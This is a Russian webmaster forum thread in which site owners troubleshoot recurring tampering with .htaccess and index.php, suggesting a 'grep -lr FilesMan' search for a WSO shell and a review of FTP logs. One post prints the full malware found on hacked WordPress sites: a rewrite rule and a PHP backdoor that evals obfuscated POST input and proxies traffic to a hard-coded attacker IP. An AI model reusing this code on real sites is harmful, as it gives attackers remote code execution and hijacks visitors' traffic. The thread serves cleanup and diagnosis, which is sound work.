Второй день подряд меняют htaccess и index

Зачем перепахивать? - сделать бэкап + обновиться. на Рево это не так сложно.. В крайнем случае - откатиться назад.

"левые файлы" можно просмотреть тем же ай-болитом.

Левых файлов я не нашел. Уязвимость в двигле. Но где она непонятно.

Шелл есть 100% , скорей всего wso. Поройте так(если файлов не много)

grep -lr FilesMan ./

Если найдете шелл, смотрите дату создания файла и логи вам в помощь.

Судя по логам, htaccess и index.php заливали по фтп. ip польские.

Кроме того, нашли кусок кода еще в одном файле

http://pix.am/LDa6/

пишите в ICQ попробую помочь вам разобраться

Вероятней всего троян на ПК где были доступы(не рекомендую пароли в FTP менеджерах сохранять), либо , возможно забрутили FTP(зависит от хостера и сложности пароля).

Прошла ночь, ничего не залили, не поменяли. ftp менеджерами не пользуюсь.

Показатель.. :) Была ситуация, когда залили через 2 недели после зачистки..

В смысле, хорошо, конечно, что всё в порядке.. но с выводами я бы не торопился..

p.s. если невтерпеж и есть лог FTP - можно "вредный" IP-шник поискать.. :)

Похожая ситуация:

Залили файл .htaccess

<IfModule mod_rewrite.c>



	RewriteEngine on

	RewriteRule ^([0-9]+)\.(html|pdf|jar)(\?.+)?$ showthread.php



</IfModule>



<IfModule mod_rewrite.c>



	RewriteEngine on

	RewriteRule ^([0-9]+)\.(html|pdf|jar)(\?.+)?$ showthread.php



</IfModule>

И showthread.php

<?php





$host = '213.133.123.43';





@error_reporting(0);

@ini_set("display_errors", 0);

@ini_set("log_errors", 0);

@ini_set("error_log", 0);





if (isset($_POST['e']) && !empty($_POST['e']))

{

	eval(base64_decode(str_rot13(strrev(base64_decode(str_rot13($_POST['e']))))));

	exit();

}





$ch = curl_init();

curl_setopt($ch, CURLOPT_HEADER, true);

curl_setopt($ch, CURLOPT_VERBOSE, false);

curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);

curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);

curl_setopt($ch, CURLOPT_URL, 'http://' . $host . $_SERVER['REQUEST_URI']);

curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);

curl_setopt($ch, CURLOPT_TIMEOUT, 7);

curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 3);

curl_setopt($ch, CURLOPT_REFERER, $_SERVER['HTTP_REFERER']);

curl_setopt($ch, CURLOPT_HTTPHEADER, array(

	

	'X-Server-IP: ' . $host,

	'X-Real-IP: ' . $_SERVER['REMOTE_ADDR'],

	'X-Real-Host: ' . $_SERVER['HTTP_HOST'],

	'X-Real-Request-Uri: ' . urlencode($_SERVER['REQUEST_URI']),

	

));



if (count($_POST) > 0)

{

	curl_setopt($ch, CURLOPT_POST, true);

	curl_setopt($ch, CURLOPT_POSTFIELDS, $_POST);

}



$page = curl_exec($ch);

$err  = curl_errno($ch);





header('X-Curl-Errno: ' . $err);





if ($err == 0)

{

	

	$page = str_replace ("HTTP/1.1 100 Continue\r\n\r\n", '', $page);

	

	list($pageHeaders, $pageData) = explode("\r\n\r\n", $page, 2);

	

	$pageHeadersArr = explode("\r\n", trim($pageHeaders));

	foreach ($pageHeadersArr AS $header)

	{

		

		if (preg_match('/^HTTP\/1[.][01] 404/Usi', $header)) header($header);

		if (preg_match('/^Location/Usi', $header)) header($header);

		if (preg_match('/^Expires/Usi', $header)) header($header);

		if (preg_match('/^Cache-Control/Usi', $header)) header($header);

		if (preg_match('/^Pragma/Usi', $header)) header($header);

		if (preg_match('/^Content-Transfer-Encoding/Usi', $header)) header($header);

		if (preg_match('/^Content-Length/Usi', $header)) header($header);

		if (preg_match('/^Content-Disposition/Usi', $header)) header($header);

		if (preg_match('/^Content-Type/Usi', $header)) header($header);

		

	}

	

	print $pageData;

	

}



curl_close($ch);



?>

В index.php соответственно вставляют закодированный редирект.

Такая картина наблюдалась на всех сайтах на wordpress одного хостинга и почему то еще на одном сайтике на чистом штмл, остальные сайты в этом же аккаунте не затронули.

А что за хостинг, сообщите, пожалуйста, в личку?